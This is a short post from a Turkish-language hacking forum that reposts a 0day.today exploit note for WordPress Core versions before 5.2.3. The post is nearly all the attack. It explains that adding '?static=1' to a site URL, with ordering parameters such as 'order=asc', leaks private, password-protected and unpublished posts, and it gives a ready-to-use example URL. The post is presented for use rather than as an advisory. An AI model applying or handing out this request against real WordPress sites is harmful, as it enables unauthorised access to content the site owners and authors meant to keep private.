Hoşgeldin Misafir

WordPress Core 5.2.3 - Viewing Unauthenticated/Password/Private Posts Vulnerability

NasyoneL

NasyoneL

Karanlık Özgürlüktür
25 Ağu 2017
25,060 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
WordPress Core 5.2.3 - Viewing Unauthenticated/Password/Private Posts Vulnerability

Kod:
WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts
 
So far we know that adding `?static=1` to a wordpress URL should leak its secret content
 
Here are a few ways to manipulate the returned entries:
 
- `order` with `asc` or `desc`
- `orderby`
- `m` with `m=YYYY`, `m=YYYYMM` or `m=YYYYMMDD` date format
 
 
In this case, simply reversing the order of the returned elements suffices and `http://wordpress.local/?static=1&order=asc` will show the secret content:
 
#  0day.today [2019-11-24]  #